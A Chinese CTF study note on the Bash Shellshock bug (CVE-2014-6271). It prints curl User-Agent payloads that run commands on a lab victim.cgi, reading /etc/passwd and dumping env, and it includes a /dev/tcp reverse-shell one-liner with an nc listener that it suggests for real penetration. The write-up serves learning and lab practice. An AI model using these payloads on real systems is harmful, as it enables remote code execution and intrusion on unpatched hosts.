学习笔记19.[Bash]Shellshock

讲在前面

对于shellshock漏洞,还是必须要补充一些点的
网上对于这个漏洞的复现教程所剩无几,可能是因为破坏力实在太大,且易于实施。
2014 年 9 月 24 日,Bash 惊爆严重安全漏洞,编号为 CVE-2014-6271,该漏洞将导致远程攻击者在受影响的系统上执行任意代码。GNU Bash 是一个为 GNU 计划编写的 Unix Shell,广泛使用在 Linux 系统内,最初的功能仅是一个简单的基于终端的命令解释器。这意味全球至少 150 万的主机将受到影响,此外 Linux/Unix 世界内的安卓和苹果都难幸免。

题目

image.png

在vulhub上有该题的补充说明,知道有一个victim.cgi网页

image.png

使用curl -A 或者 -H 参数模拟Http头命令,并调用“cat /etc/passwd”读passwd文件,发送到存在Bash漏洞的docker容器,成功读取到了passwd文件内容。

curl -A "() { echo ShellShock; }; echo; /bin/cat /etc/passwd" http://node3.buuoj.cn:28253/victim.cgi

image.png

成功回显
如果是用bp来测试的话
修改http协议中的User-Agent字段为:

() { :; };echo;/bin/cat /etc/passwd

效果是一样的,在此就不上图了
*对于实际渗透过程中,我们可以直接放反弹shell

curl -A "() { :; };echo;/bin/bash -i >& /dev/tcp/监听机IP/1234 0>&1" http://node3.buuoj.cn:28253/victim.cgi

然后起一个nc就欧克
nc -lvvp 1234

对于这道题来说,启动不了反弹shell,没反应,可能是权限问题,那我们直接查看env就可以

curl -A "() { echo ShellShock; }; echo;/usr/bin/env" http://node3.buuoj.cn:28253/victim.cgi                                                                                                                         
HTTP_HOST=node3.buuoj.cn:28253 
image.png

!!!没有flag,直接cat /flag也一样,就是没有!一血就这么没了

image.png

疯狂吐槽赵总


image.png
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 官网 中文版本 好的网站 Content-type: text/htmlBASH Section: User ...
    不排版阅读 4,509评论 0 5
  • 第一章 1.Linux是一套免费使用和自由传播的类UNIX操作系统,它可以基于Intel x86系列处理器以及Cy...
    yansicing阅读 5,491评论 0 9
  • 1.1 为什么要学Shell编程? Shell脚本语言是实现Linux/UNIX系统管理及自动化运维所必备的重要工...
    张鑫泽_2109阅读 489评论 0 0
  • 转载至异次纪元文章链接:http://www.iplaysoft.com/p/brief-history-of-l...
    弄浪的鱼1阅读 3,327评论 0 22
  • 今天是曾经教过的学生伟与川结婚大喜的日子,因在外学习,没法到场祝贺,只能通过现代化的快捷方式送上贺礼,再利...
    七月风来阅读 344评论 0 1